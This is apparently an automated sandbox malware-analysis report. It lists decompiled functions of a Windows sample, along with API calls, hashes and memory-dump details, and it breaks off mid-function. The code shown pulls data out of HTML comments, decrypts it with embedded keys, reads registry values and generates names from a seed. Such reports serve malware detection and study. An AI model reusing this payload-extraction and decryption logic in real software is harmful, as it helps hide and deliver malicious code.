
Strings

pigalicapi, xrefs: 04005E03

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: CreateErrorLastMutex
String ID: pigalicapi
API String ID: 1925916568-2184165135
Opcode ID: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
Instruction ID: c9a096dff23d34124f73a3e8575822b5ba186ec69b5811b6053c60030017a183
Opcode Fuzzy Hash: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
Instruction Fuzzy Hash: FAC08C362883186BF2081B61ED4BB893A88C792E81F600030F30AEA0D0999968C08B16

Uniqueness

Uniqueness Score: -1.00%

Function 04008250 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04008250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v13;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _t48;
				intOrPtr _t51;
				intOrPtr _t58;
				char _t63;
				void* _t77;
				void* _t78;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
					_v12 = 0;
					_v20 = _a4;
					_v13 = 0;
					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
						_t48 = "<!--"; // 0x2d2d213c
						_v32 = _t48;
						_t63 =  *0x400c700; // 0x0
						_v28 = _t63;
						_t51 = E04007AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
						_t78 = _t77 + 0x10;
						_v24 = _t51;
						if(_v24 == 0) {
						} else {
							_v12 = _v24 - _a4;
							_t28 = _v12 + 4; // 0x4
							_v36 = StrStrA(_v20 + _t28, "-->");
							if(_v36 != 0) {
								_v44 = _v36 - _v24 - 4;
								_t58 = E04008090(_v24 + 4, _v44, _a12, _a16); // executed
								_t77 = _t78 + 0x10;
								_v40 = _t58;
								if(_v40 > 0) {
									_v13 = 1;
									_v8 = _v40;
								}
								_v12 = _v12 + 4;
								continue;
							}
						}
						goto L16;
					}
				}
				L16:
				return _v8;
			}

0x04008256
0x04008261
0x04008285
0x0400828f
0x04008292
0x04008296
0x040082b1
0x040082b6
0x040082b9
0x040082bf
0x040082d6
0x040082db
0x040082de
0x040082e5
0x040082e7
0x040082ed
0x040082fb
0x04008306
0x0400830d
0x04008318
0x0400832e
0x04008333
0x04008336
0x0400833d
0x0400833f
0x04008346
0x04008346
0x0400834f
0x00000000
0x0400835a
0x0400830d
0x00000000
0x040082e5
0x04008296
0x0400835f
0x04008365

APIs

StrStrA.SHLWAPI(00000004,-->), ref: 04008300

Part of subcall function 04008090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8

Strings

<!--, xrefs: 040082B1
-->, xrefs: 040082F0

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: AllocVirtual
String ID: -->$<!--
API String ID: 4275171209-1166897919
Opcode ID: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
Instruction ID: 33a7bc7995a4c535701f75233fb1c46eed47e0fb0959c3fa2371b97aa1c284c8
Opcode Fuzzy Hash: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
Instruction Fuzzy Hash: 23311971900249DFEF04EFA8C544BEEBBB1BB88308F14C959D505B7281E774AA84CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0400A400 Relevance: 4.6, APIs: 3, Instructions: 53
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0400A400(char* _a4, char* _a8, char* _a12, int _a16) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _t25;
				long _t27;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
					_v12 = 0x80000001;
					if(( *0x401435a & 0x000000ff) != 0) {
						_v12 = 0x80000002;
					}
					_v16 = 0;
					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
					if(_t25 == 0) {
						_v20 = _a16;
						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
						if(_t27 == 0) {
							_v8 = _v20;
						}
						RegCloseKey(_v16); // executed
					}
				}
				return _v8;
			}

0x0400a406
0x0400a411
0x0400a429
0x0400a439
0x0400a43b
0x0400a43b
0x0400a442
0x0400a45c
0x0400a464
0x0400a469
0x0400a480
0x0400a488
0x0400a48d
0x0400a48d
0x0400a494
0x0400a494
0x0400a464
0x0400a4a0

APIs

RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
RegCloseKey.KERNEL32(00000000), ref: 0400A494

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
Instruction ID: 715db8aa4ed00a9f1925e7802d1785fb3623660146ed6b0049a8ef53f9c2d8f0
Opcode Fuzzy Hash: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
Instruction Fuzzy Hash: 70110D74A00309EBEB15CF94C848BEF77B8FB84744F14C558E914AB680D7B8AA51CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDCC Relevance: 4.5, APIs: 3, Instructions: 28synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040EBE0: GetAtomNameA.KERNEL32(?,?,0040DB50), ref: 0040EC03

free.MSVCRT ref: 0040EDA2
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040EDAD
FindCloseChangeNotification.KERNEL32 ref: 0040EDB9
memset.NTDLL ref: 0040EDFC

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: AtomChangeCloseFindMutexNameNotificationReleasefreememset
String ID:
API String ID: 342251636-0
Opcode ID: 44162ba2f567e4785b2b797dfd594cafc1bf0faf778d2d143437323698a3bf36
Instruction ID: e0ba675913fac37eea7b8a293b535138c2be36a3a1ced07d229613690e4f81d1
Opcode Fuzzy Hash: 44162ba2f567e4785b2b797dfd594cafc1bf0faf778d2d143437323698a3bf36
Instruction Fuzzy Hash: 61F01C76A045158BCB10BF6698840BDF7F1FE44314B454C7EE996A3350D738A426CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 04008090 Relevance: 3.9, APIs: 3, Instructions: 147
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04008090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
				long _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				long _v52;
				void* _t71;
				intOrPtr _t73;
				void* _t91;
				void* _t93;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L13:
					return _v8;
				} else {
					_v16 = _a8;
					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
					_v12 = _t71;
					if(_v12 != 0) {
						_t73 = E04001390(_v12, _a4, _v16, _v12, _v16); // executed
						_v20 = _t73;
						if(_v20 != 0) {
							_v24 = _v12;
							_v28 = _v20;
							_v32 = E040087B0(_v20,  *_v24) & 0x0000ffff;
							if(_v32 == 0xa) {
								_v40 =  *((intOrPtr*)(_v24 + 4));
								_v44 =  *((intOrPtr*)(_v24 + 8));
								_v36 = E040016F0(_v24 + 0xc, _v28 - 0xc);
								if(_v36 == _v44) {
									E04008630(_v24 + 0xc, 4, _v40);
									_v48 =  *((intOrPtr*)(_v24 + 0xc));
									E04008630(_v24 + 0x10, _v48, _v40);
									_v52 = _v28 - _v48 + 0x10;
									_t52 = _v48 + 0x10; // 0x10
									_t91 = E04008A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x4013410, 0x254); // executed
									if(_t91 != 0) {
										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
										 *_a12 = _t93;
										if( *_a12 != 0) {
											_t60 = _v48 + 0x10; // 0x10
											E04007B70( *_a12, _v24 + _t60, _v52);
											 *_a16 = _v52;
											_v8 = _v52;
										}
									}
								}
							}
						}
						if(_v8 == 0) {
							VirtualFree(_v12, 0, 0x8000); // executed
						}
					}
					goto L13;
				}
			}

0x04008096
0x040080a1
0x04008246
0x0400824c
0x040080c5
0x040080c8
0x040080d8
0x040080de
0x040080e5
0x040080fb
0x04008103
0x0400810a
0x04008113
0x04008119
0x0400812d
0x04008134
0x04008140
0x04008149
0x04008162
0x0400816b
0x0400817e
0x0400818c
0x0400819e
0x040081b1
0x040081d3
0x040081d8
0x040081e2
0x040081f1
0x040081fa
0x04008202
0x0400820e
0x04008219
0x04008227
0x0400822c
0x0400822c
0x04008202
0x040081e2
0x0400816b
0x04008134
0x04008233
0x04008240
0x04008240
0x04008233
0x00000000
0x040080e5

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04008240

Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 040081F1

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
String ID:
API String ID: 142027497-0
Opcode ID: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
Instruction ID: 586cb0610e47de0410656fb7eac1ad2d30ffe64d38e300cd8a2e1f05076280ab
Opcode Fuzzy Hash: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
Instruction Fuzzy Hash: 3551E7B5E00209AFEB14DF98D984BEEB7B5BB48304F14C158E905BB381D774AA40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04005930 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E04005930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v24;
				void _v52;
				intOrPtr _v56;
				signed int _v60;
				void* _t70;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
					E04007B70( &_v24, _a4, 0x10);
					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
					asm("movsw");
					asm("movsb");
					_v56 = 0;
					while(_v56 < _a12) {
						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
						if(_v56 == 0) {
							CharUpperA(_a8); // executed
						}
						_v8 = _v8 + 1;
						_v56 = _v56 + 1;
					}
				}
				return _v8;
			}

0x04005938
0x04005943
0x04005971
0x04005986
0x04005988
0x0400598a
0x0400598b
0x0400599d
0x040059c6
0x040059d6
0x040059dc
0x040059e2
0x040059e2
0x040059ee
0x0400599a
0x0400599a
0x0400599d
0x040059fb

APIs

CharUpperA.USER32(00000000), ref: 040059E2

Strings

abcdefghijklmnopqrstuvwxyz, xrefs: 0400597E

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: CharUpper
String ID: abcdefghijklmnopqrstuvwxyz
API String ID: 9403516-1277644989
Opcode ID: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
Instruction ID: f69ee34caa0c5af81cf691572c0dafb25cbc9a5132ff2a0986e08936ddab1125
Opcode Fuzzy Hash: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
Instruction Fuzzy Hash: F7210C35A06108EBEF04CF98D984BDDB7B6FF85315F248569E804A7280D375AA45CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0C0 Relevance: 3.2, APIs: 2, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040D0C0(void* __ebx, signed int __edi, signed int __esi) {
				void* _v16;
				signed int _v44;
				char* _v56;
				char _v60;
				void* _v61;
				void* _v64;
				char* _v80;
				intOrPtr _v84;
				signed int _v88;
				intOrPtr _t61;
				void* _t66;
				int _t70;
				signed int _t74;
				long _t76;
				signed int _t80;
				void* _t81;
				signed int _t83;
				signed char* _t87;
				signed int _t93;
				intOrPtr* _t94;
				signed int _t98;
				signed int _t100;
				signed short _t101;
				signed char _t106;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t121;
				signed int _t122;
				signed int _t126;
				int _t135;
				void* _t145;
				char** _t147;

				_t130 = __esi;
				_t119 = __edi;
				_t61 =  *0x42206c; // 0x1
				if(_t61 == 0) {
					_push(__edi);
					_push(__esi);
					 *0x42206c = 1;
					_t66 = E0040DB20(0x0000001e + (E0040D950() + _t62 * 0x00000002) * 0x00000004 & 0xfffffff0, __ebx);
					 *0x422070 = 0;
					_t147 = _t145 - 0x4c - _t66;
					 *0x422074 =  &_v61 & 0xfffffff0;
					_t70 = 0x18;
					__eflags = 0x4219b4 - 7;
					if(0x4219b4 <= 7) {
						L14:
						return _t70;
					} else {
						__eflags = 0x4219b4 - 0xb;
						if(0x4219b4 <= 0xb) {
							_t93 = 0x42199c;
							goto L26;
						} else {
							_t70 =  *0x42199c; // 0x0
							__eflags = _t70;
							if(_t70 != 0) {
								L15:
								_t93 = 0x42199c;
								goto L16;
							} else {
								_t70 =  *0x4219a0; // 0x0
								__eflags = _t70;
								if(_t70 != 0) {
									goto L15;
								} else {
									_t119 =  *0x4219a4; // 0x1
									_t93 = 0x4219a8;
									__eflags = _t119;
									if(_t119 == 0) {
										L26:
										_t130 =  *_t93;
										__eflags =  *_t93;
										if( *_t93 != 0) {
											L16:
											__eflags = _t93 - 0x4219b4;
											if(_t93 >= 0x4219b4) {
												goto L14;
											} else {
												_v64 =  &_v56;
												do {
													_t17 = _t93 + 4; // 0x0
													_t110 =  *_t17;
													_t93 = _t93 + 8;
													_t18 = _t110 + 0x400000; // 0x400000
													_t19 = _t110 + 0x400000; // 0x905a4d
													_t20 = _t93 - 8; // 0x4e472820
													_v56 =  *_t19 +  *_t20;
													E0040CE80(_t18, _t93, 4, _v64, _t119, _t130);
													__eflags = _t93 - 0x4219b4;
												} while (_t93 < 0x4219b4);
												goto L19;
											}
										} else {
											_t38 = _t93 + 4; // 0x0
											_t95 =  *_t38;
											__eflags =  *_t38;
											if( *_t38 == 0) {
												goto L8;
											} else {
												goto L16;
											}
										}
									} else {
										_t93 = 0x42199c;
										L8:
										_t6 = _t93 + 8; // 0x1
										_t80 =  *_t6;
										__eflags = _t80 - 1;
										if(_t80 != 1) {
											L35:
											_v88 = _t80;
											 *_t147 = "  Unknown pseudo relocation protocol version %d.\n";
											_t81 = L0040CE20(_t93, _t95, _t109, _t119, _t130);
											0;
											0;
											asm("fninit");
											return _t81;
										} else {
											_t94 = _t93 + 0xc;
											__eflags = _t94 - 0x4219b4;
											if(_t94 < 0x4219b4) {
												do {
													_t114 =  *_t94;
													_t7 = _t94 + 4; // 0x312e382e
													_t121 =  *_t7;
													_t9 = _t121 + 0x400000; // 0x316e382e
													_t87 = _t9;
													_v64 =  *((intOrPtr*)(_t114 + 0x400000));
													_t11 = _t94 + 8; // 0x0
													_t100 =  *_t11 & 0x000000ff;
													__eflags = _t100 - 0x10;
													if(_t100 == 0x10) {
														_t101 =  *(_t121 + 0x400000) & 0x0000ffff;
														_t122 = _t101 & 0x0000ffff;
														__eflags = _t101;
														_t123 =  <  ? _t122 | 0xffff0000 : _t122;
														_t124 = ( <  ? _t122 | 0xffff0000 : _t122) - _t114;
														_t125 = ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000;
														_v64 =  &_v56;
														_t135 = _v64 + ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000;
														__eflags = _t135;
														_v56 = _t135;
														E0040CE80(_t87, _t94, 2,  &_v56, ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000, _t135);
														goto L30;
													} else {
														__eflags = _t100 - 0x20;
														if(_t100 == 0x20) {
															_v64 =  &_v56;
															_t138 = _v64 - _t114 + 0x400000 +  *_t87;
															_v56 = _v64 - _t114 + 0x400000 +  *_t87;
															E0040CE80(_t87, _t94, 4,  &_v56, _t121, _v64 - _t114 + 0x400000 +  *_t87); // executed
															goto L30;
														} else {
															__eflags = _t100 - 8;
															if(_t100 == 8) {
																_t106 =  *_t87 & 0x000000ff;
																_t126 = _t106 & 0x000000ff;
																__eflags = _t106;
																_t127 =  <  ? _t126 | 0xffffff00 : _t126;
																_t128 = ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000;
																_t129 = ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
																_t138 = _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
																_v64 =  &_v56;
																_v56 = _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
																E0040CE80(_t87, _t94, 1,  &_v56, ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114, _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114);
																goto L30;
															} else {
																_v88 = _t100;
																 *_t147 = "  Unknown pseudo relocation bit size %d.\n";
																_v56 = 0;
																_t70 = L0040CE20(_t94, _t100, _t114, _t121, _t138);
																goto L14;
															}
														}
													}
													goto L37;
													L30:
													_t94 = _t94 + 0xc;
													__eflags = _t94 - 0x4219b4;
												} while (_t94 < 0x4219b4);
												L19:
												_t70 =  *0x422070; // 0x1
												_t93 = 0;
												__eflags = _t70;
												if(_t70 > 0) {
													do {
														_t74 =  *0x422074; // 0x64fde0
														_t130 = _t93 + _t93 * 2;
														_t119 = _t130 * 4;
														_t70 = _t74 + _t119;
														_t109 =  *_t70;
														__eflags =  *_t70;
														if( *_t70 == 0) {
															goto L21;
														} else {
															_v84 = 0x1c;
															_v88 = _v64;
															_t29 = _t70 + 4; // 0x418aa0
															 *_t147 =  *_t29;
															_t76 = VirtualQuery(??, ??, ??);
															_t147 = _t147 - 0xc;
															__eflags = _t76;
															if(_t76 == 0) {
																_t98 =  *0x422074; // 0x64fde0
																_t95 = _t98 + _t119;
																__eflags = _t95;
																_t55 = _t95 + 4; // 0x418aa0
																_v84 =  *_t55;
																_t57 = _t95 + 8; // 0x41910c
																_t58 =  *_t57 + 8; // 0x10d00ff
																 *_t147 = "  VirtualQuery failed for %d bytes at address %p";
																_v88 =  *_t58;
																_t80 = L0040CE20(_t93, _t95, _t109, _t119, _t130);
																goto L35;
															} else {
																_v80 =  &_v60;
																_t83 =  *0x422074; // 0x64fde0
																_v84 =  *((intOrPtr*)(_t83 + _t130 * 4));
																_v88 = _v44;
																 *_t147 = _v56; // executed
																_t70 = VirtualProtect(??, ??, ??, ??); // executed
																_t147 = _t147 - 0x10;
																goto L21;
															}
														}
														goto L37;
														L21:
														_t93 = _t93 + 1;
														__eflags = _t93 -  *0x422070; // 0x1
													} while (__eflags < 0);
												} else {
												}
											}
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					return _t61;
				}
				L37:
			}

0x0040d0c0
0x0040d0c0
0x0040d0c0
0x0040d0c7
0x0040d0d3
0x0040d0d4
0x0040d0d9
0x0040d0f5
0x0040d0fa
0x0040d104
0x0040d10d
0x0040d117
0x0040d11c
0x0040d11f
0x0040d1c1
0x0040d1c8
0x0040d125
0x0040d125
0x0040d128
0x0040d293
0x00000000
0x0040d12e
0x0040d12e
0x0040d133
0x0040d135
0x0040d1c9
0x0040d1c9
0x00000000
0x0040d13b
0x0040d13b
0x0040d140
0x0040d142
0x00000000
0x0040d148
0x0040d148
0x0040d14e
0x0040d153
0x0040d155
0x0040d298
0x0040d298
0x0040d29a
0x0040d29c
0x0040d1ce
0x0040d1ce
0x0040d1d4
0x00000000
0x0040d1d6
0x0040d1d9
0x0040d1e0
0x0040d1e0
0x0040d1e0
0x0040d1e8
0x0040d1eb
0x0040d1f1
0x0040d1f7
0x0040d1fa
0x0040d200
0x0040d205
0x0040d205
0x00000000
0x0040d1e0
0x0040d2a2
0x0040d2a2
0x0040d2a2
0x0040d2a5
0x0040d2a7
0x00000000
0x0040d2ad
0x00000000
0x0040d2ad
0x0040d2a7
0x0040d15b
0x0040d15b
0x0040d160
0x0040d160
0x0040d160
0x0040d163
0x0040d166
0x0040d383
0x0040d383
0x0040d387
0x0040d38e
0x0040d399
0x0040d39d
0x0040d3a0
0x0040d3a2
0x0040d16c
0x0040d16c
0x0040d16f
0x0040d175
0x0040d177
0x0040d177
0x0040d179
0x0040d179
0x0040d182
0x0040d182
0x0040d188
0x0040d18b
0x0040d18b
0x0040d18f
0x0040d192
0x0040d2b2
0x0040d2b9
0x0040d2c4
0x0040d2c7
0x0040d2cd
0x0040d2d2
0x0040d2d8
0x0040d2e3
0x0040d2e3
0x0040d2e5
0x0040d2e8
0x00000000
0x0040d198
0x0040d198
0x0040d19b
0x0040d345
0x0040d34f
0x0040d354
0x0040d357
0x00000000
0x0040d1a1
0x0040d1a1
0x0040d1a4
0x0040d301
0x0040d304
0x0040d30f
0x0040d311
0x0040d317
0x0040d31d
0x0040d322
0x0040d324
0x0040d32f
0x0040d332
0x00000000
0x0040d1aa
0x0040d1aa
0x0040d1ae
0x0040d1b5
0x0040d1bc
0x00000000
0x0040d1bc
0x0040d1a4
0x0040d19b
0x00000000
0x0040d2ed
0x0040d2ed
0x0040d2f0
0x0040d2f0
0x0040d20d
0x0040d20d
0x0040d212
0x0040d214
0x0040d216
0x0040d22b
0x0040d22b
0x0040d230
0x0040d233
0x0040d23a
0x0040d23c
0x0040d23e
0x0040d240
0x00000000
0x0040d242
0x0040d245
0x0040d24d
0x0040d251
0x0040d254
0x0040d257
0x0040d25d
0x0040d260
0x0040d262
0x0040d35e
0x0040d364
0x0040d364
0x0040d366
0x0040d369
0x0040d36d
0x0040d370
0x0040d373
0x0040d37a
0x0040d37e
0x00000000
0x0040d268
0x0040d26b
0x0040d26f
0x0040d277
0x0040d27e
0x0040d285
0x0040d288
0x0040d28e
0x00000000
0x0040d28e
0x0040d262
0x00000000
0x0040d220
0x0040d220
0x0040d223
0x0040d223
0x00000000
0x0040d218
0x0040d216
0x00000000
0x0040d175
0x0040d166
0x0040d155
0x0040d142
0x0040d135
0x0040d128
0x0040d0c9
0x0040d0c9
0x0040d0c9
0x00000000

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc5d2d502416e41f7d9eddc792febd8f4f97fcbe738563a939ef138da5529d8
Instruction ID: c9f2d9c8f812e7c608e2c1f9d0c6a3859adaa46158f161601ba7db1d9c1a457c
Opcode Fuzzy Hash: 6dc5d2d502416e41f7d9eddc792febd8f4f97fcbe738563a939ef138da5529d8
Instruction Fuzzy Hash: 6F719F71E012149FCB14CFA9E9807ADB7F1EF44304F54827BE845AB3A5DB389949CB89

Uniqueness

Uniqueness Score: -1.00%

Function 04009400 Relevance: 3.1, APIs: 2, Instructions: 106
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04009400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v91;
				char _v92;
				char _v220;
				intOrPtr _t59;
				void* _t103;
				void* _t104;
				void* _t106;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
					_t56 = E04007B70( &_v28, _a4 + 0x45b, 0x10);
					_t104 = _t103 + 0xc;
					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
					_v32 = 0;
					while(_v32 < _a12) {
						E04007D20(_t56,  &_v220, 0, 0x80);
						_t59 = E04008BB0( &_v12, 4,  &_v220, 0x80); // executed
						_t106 = _t104 + 0x1c;
						_v40 = _t59;
						if(_v40 <= 0) {
